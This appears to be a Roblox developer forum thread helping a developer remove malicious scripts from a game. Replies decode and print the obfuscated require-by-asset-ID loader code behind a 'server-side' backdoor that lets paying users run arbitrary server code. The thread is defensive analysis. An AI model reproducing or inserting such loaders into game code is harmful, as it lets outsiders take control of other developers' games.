I found this:
require(1643016165.67*3-0.01).Load()
Ok, delete this too probably. (30 chars)
I just found the virus, the thing you sent here is the virus. I think
Also i’m not sure if its possible but. He used math to do the roblox id thing and his name is LoadingVirus26
Yeah that’s Lua Bytecode (I think)
It’s probably leading to your issue.
Use Venom at is very sensitive and will find scripts that you can not see inside your roblox game. It gives you a choice to clean your game from scripts. https://www.roblox.com/library/4216304328/Venom-Intercept-Malicious-Scripts
Also read this so you do not accidentally delete your game Venom [Intercept Malicious Scripts]
I would recommend Kronos for this situation. Very good plugin.
Odds are that you are using a virus plugin. Go though your plugins and check them for authenticity. You should look at the creators account and check it isn’t a botted plugin. Odds are that you mistakenly installed a bad plugin which is inserting scripts into your workspace each time you load up studio
I have done some maths for this suspicious code. And I was very surprised that it wasn’t a decimal number, it’s an id:
4929048497
Do not use tge place tree plugin. It destroyed my game with so many infections. It was impossible to stop because everytime you try to delete it, it multiplies itself!
I searched the id and find out that it was mentioned in a dev forum topic:
It is indeed a malicious plugin.
And it’s name is “test” (yes it is unoriginal and has high probabilities to be malicious)
This is just an obfuscated form of a require statement.
You can see that the an index of the result of the getfenv
function (which returns the environment: a table of variables available to the script in the given scope).
If we do
local environment = getfenv()
environment.print("Hello world!")
We’ll, get Hello world!
Now that we know what getfenv
does, we need to find out what the string of numbers does. These numbers are just meant to obfuscate what are actually letters. We can get these letters by running the string.char
function on each number.
local numbers = {114, 101, 113, 117, 105, 114, 101}
for _, number in pairs(numbers) do
print(string.char(number))
end
You’ll get require
in the output. This shows that the require
function is being called.
There are two ways to use require. The first is the most common, and is requiring a script, by it’s object. The second is requiring a script by it’s asset ID. What you’re seeing is the second method.
You can take a look at the cause of your troubles here:
https://www.roblox.com/library/4958213401/AssetMain
If we take a look at the source of this module, we can see that it’s simply this:
local module = {}
--lol!
lol=game:GetService("MarketplaceService"):GetProductInfo(5108221416).Description;local a=string.match(lol,"%d+")require(tonumber(a.."5616"))
return module
This gets the info of the asset with the asset ID 5108221416
(which is just spam), and finds the number in it (which is 510820
), and puts 5616
. The result of this is it requiring 5108205616
.
This goes on and on, and I’m out of time. But, the main thing is that this is untrustworthy, as the owner clearly wants to hide the real code. Regardless, this is definitely the source of your problems and you should just remove the cause of this.
Edit: Oh shoot, this is not only advertising some random model, but this is actually adding a server-side to your game! A server-side is just an executor that doesn’t require any exploit, allows users (who in most cases pay to use it) to execute any code they want on the server. This bypasses filtering-enabled, and is very dangerous to your game.
If you want to investigate further, the module is here (apparently, it’s called Builderx
):
https://www.roblox.com/library/4941366797/main
Another Edit: I just found out that the criteria for getting access to the executor is simply being in this group. (This group will probably be deleted soon)
https://www.roblox.com/groups/6091888/hacker-c00lkid#!/about
Thats a virus.
(30 charssssssssss)
If you’re wondering a little more about server-sides, I happen to be in many of their communities and even tried making one myself for my own games. They basically bot models containing the SS to the front page (against TOS), but actually using one and infecting games seems to be a gray area in the TOS. I’m honestly not sure if it’s allowed, but it seems to be. Serversides bypass FE, effectively. They allow a user whitelisted on the SS able to execute server sided code, hence the name. Be very careful with ‘em.
Hey, https://www.roblox.com/library/5045212184/Smooth-Cam i found a backddor in the source code so if you are this plugin uninstall it
I didn’t have time to read all the messages, but when your game was
I’m pretty sure it wasn’t, I think it was just a malicious plugin you somehow didn’t find that kept on spawning malicious scripts whenever you open Studio. But it might not be, it’s just from personal experience ¯ \ (ツ)/¯
(running away from the place where the issue is will probably just make the viruses migrate)
Wait, you can BUY models now?
Oh, boy.
Did you mean to reply to me?
And I mean you can have paid models, if you do commissions for people and stuff… but there’s no official thing for it, like you can’t buy it from Roblox (like plugins)
(at least I think so…?)
Best advise. Don’t use free models that are super public. Use packs such as Nature pack Model Pack and Mesh Packs.
Probably a fake plugin. Look through the ones you have installed and see if any don’t show up in the plugin bar (Like you installed something to make trees with but you can’t actually use the plugin)
Also double-check that you installed all plugins from their original creators.